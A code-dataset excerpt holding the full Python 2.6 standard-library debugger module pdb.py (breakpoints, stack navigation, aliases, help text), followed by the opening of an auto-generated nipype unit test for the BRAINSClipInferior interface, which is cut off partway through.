images/install/disk-contents/libraries/python2.6/pdb.py
|
51
|
#! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from repr import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining a command list
self.commands_bnum = None # The breakpoint number for which we are defining a list
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print >>self.stdout, '--Call--'
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self,frame):
""" Call every command that was set for the current active breakpoint (if there is one)
Returns True if the normal interaction function must be called, False otherwise """
#self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
if getattr(self,"currentbp",False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
print >>self.stdout, '--Return--'
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
exc_type, exc_value, exc_traceback = exc_info
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else: exc_type_name = exc_type.__name__
print >>self.stdout, exc_type_name + ':', _saferepr(exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
print repr(obj)
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', v
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self,line):
""" Handles one command line during command list definition. """
cmd, arg, line = self.parseline(line)
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if (arg):
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
if func.func_name in self.commands_resuming : # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print >>self.stdout, "Usage : commands [bnum]\n ...\n end"
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
self.cmdloop()
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print >>self.stdout, "Num Type Disp Enb Where"
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print >>self.stdout, '*** ', repr(filename),
print >>self.stdout, 'not found from sys.path'
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError, msg:
print >>self.stdout, '*** Bad lineno:', arg
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print >>self.stdout, '*** The specified object',
print >>self.stdout, repr(arg),
print >>self.stdout, 'is not a function'
print >>self.stdout, 'or was not found along sys.path.'
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print >>self.stdout, '***', err
else:
bp = self.get_breaks(filename, line)[-1]
print >>self.stdout, "Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, 'End of file'
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print >>self.stdout, '*** Blank or comment'
return 0
return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.cond = cond
if not cond:
print >>self.stdout, 'Breakpoint', bpnum,
print >>self.stdout, 'is now unconditional.'
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print >>self.stdout, reply + ' of breakpoint %d.' % bpnum
else:
print >>self.stdout, 'Will stop next time breakpoint',
print >>self.stdout, bpnum, 'is reached.'
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = raw_input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print >>self.stdout, '***', err
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
err = self.clear_bpbynumber(i)
if err:
print >>self.stdout, '***', err
else:
print >>self.stdout, 'Deleted breakpoint', i
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print >>self.stdout, '*** Oldest frame'
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print >>self.stdout, '*** Newest frame'
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print >>self.stdout, "*** You can only jump within the bottom frame"
return
try:
arg = int(arg)
except ValueError:
print >>self.stdout, "*** The 'jump' command requires a line number."
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError, e:
print >>self.stdout, '*** Jump failed:', e
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print >>self.stdout, "ENTERING RECURSIVE DEBUGGER"
sys.call_tracing(p.run, (arg, globals, locals))
print >>self.stdout, "LEAVING RECURSIVE DEBUGGER"
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print >>self.stdout
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print >>self.stdout, name, '=',
if name in dict: print >>self.stdout, dict[name]
else: print >>self.stdout, "*** undefined ***"
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print >>self.stdout, self.curframe.f_locals['__return__']
else:
print >>self.stdout, '*** Not yet returned!'
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
raise
def do_p(self, arg):
try:
print >>self.stdout, repr(self._getval(arg))
except:
pass
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print >>self.stdout, '*** Error in argument:', repr(arg)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, '[EOF]'
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print >>self.stdout, s + '\t' + line,
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
return
code = None
# Is it a function?
try: code = value.func_code
except: pass
if code:
print >>self.stdout, 'Function', code.co_name
return
# Is it an instance method?
try: code = value.im_func.func_code
except: pass
if code:
print >>self.stdout, 'Method', code.co_name
return
# None of the above...
print >>self.stdout, type(value)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print >>self.stdout, "%s = %s" % (alias, self.aliases[alias])
return
if args[0] in self.aliases and len(args) == 1:
print >>self.stdout, "%s = %s" % (args[0], self.aliases[args[0]])
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print >>self.stdout, '>',
else:
print >>self.stdout, ' ',
print >>self.stdout, self.format_stack_entry(frame_lineno,
prompt_prefix)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print >>self.stdout, """h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command"""
def help_where(self):
self.help_w()
def help_w(self):
print >>self.stdout, """w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print >>self.stdout, """d(own)
Move the current frame one level down in the stack trace
(to a newer frame)."""
def help_up(self):
self.help_u()
def help_u(self):
print >>self.stdout, """u(p)
Move the current frame one level up in the stack trace
(to an older frame)."""
def help_break(self):
self.help_b()
def help_b(self):
print >>self.stdout, """b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
def help_clear(self):
self.help_cl()
def help_cl(self):
print >>self.stdout, "cl(ear) filename:lineno"
print >>self.stdout, """cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
def help_tbreak(self):
print >>self.stdout, """tbreak same arguments as break, but breakpoint is
removed when first hit."""
def help_enable(self):
print >>self.stdout, """enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
def help_disable(self):
print >>self.stdout, """disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
def help_ignore(self):
print >>self.stdout, """ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
def help_condition(self):
print >>self.stdout, """condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
def help_step(self):
self.help_s()
def help_s(self):
print >>self.stdout, """s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
def help_until(self):
self.help_unt()
def help_unt(self):
print """unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns"""
def help_next(self):
self.help_n()
def help_n(self):
print >>self.stdout, """n(ext)
Continue execution until the next line in the current function
is reached or it returns."""
def help_return(self):
self.help_r()
def help_r(self):
print >>self.stdout, """r(eturn)
Continue execution until the current function returns."""
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print >>self.stdout, """c(ont(inue))
Continue execution, only stop when a breakpoint is encountered."""
def help_jump(self):
self.help_j()
def help_j(self):
print >>self.stdout, """j(ump) lineno
Set the next line that will be executed."""
def help_debug(self):
print >>self.stdout, """debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment)."""
def help_list(self):
self.help_l()
def help_l(self):
print >>self.stdout, """l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
def help_args(self):
self.help_a()
def help_a(self):
print >>self.stdout, """a(rgs)
Print the arguments of the current function."""
def help_p(self):
print >>self.stdout, """p expression
Print the value of the expression."""
def help_pp(self):
print >>self.stdout, """pp expression
Pretty-print the value of the expression."""
def help_exec(self):
print >>self.stdout, """(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)"""
def help_run(self):
print """run [args...]
Restart the debugged python program. If a string is supplied, it is
splitted with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run"."""
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print >>self.stdout, """q(uit) or exit - Quit from the debugger.
The program being executed is aborted."""
help_exit = help_q
def help_whatis(self):
print >>self.stdout, """whatis arg
Prints the type of the argument."""
def help_EOF(self):
print >>self.stdout, """EOF
Handles the receipt of EOF as a command."""
def help_alias(self):
print >>self.stdout, """alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' the executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
"""
def help_unalias(self):
print >>self.stdout, """unalias name
Deletes the specified alias."""
def help_commands(self):
print >>self.stdout, """commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
"""
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
statement = 'execfile( "%s")' % filename
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print '*** Pager exit status:', sts
break
else:
print 'Sorry, can\'t find the help file "pdb.doc"',
print 'along the Python search path'
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while 1:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print "The program finished and will be restarted"
except Restart:
print "Restarting", mainpyfile, "with arguments:"
print "\t" + " ".join(sys.argv[1:])
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
except:
traceback.print_exc()
print "Uncaught exception. Entering post mortem debugging"
print "Running 'cont' or 'step' will restart the program"
t = sys.exc_info()[2]
pdb.interaction(None, t)
print "Post mortem debugger finished. The "+mainpyfile+" will be restarted"
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
iglpdc/nipype
|
refs/heads/master
|
nipype/interfaces/semtools/utilities/tests/test_auto_BRAINSClipInferior.py
|
12
|
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from .....testing import assert_equal
from ..brains import BRAINSClipInferior
def test_BRAINSClipInferior_inputs():
input_map = dict(BackgroundFillValue=dict(argstr='--BackgroundFillValue %s',
),
acLowerBound=dict(argstr='--acLowerBound %f',
),
args=dict(argstr='%s',
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
inputVolume=dict(argstr='--inputVolume %s',
),
numberOfThreads=dict(argstr='--numberOfThreads %d',
),
outputVolume=dict(argstr='--outputVolume %s',
hash_files=False,
),
terminal_output=dict(nohash=True,
),
)
inputs = BRAINSClipInferior.input_spec()
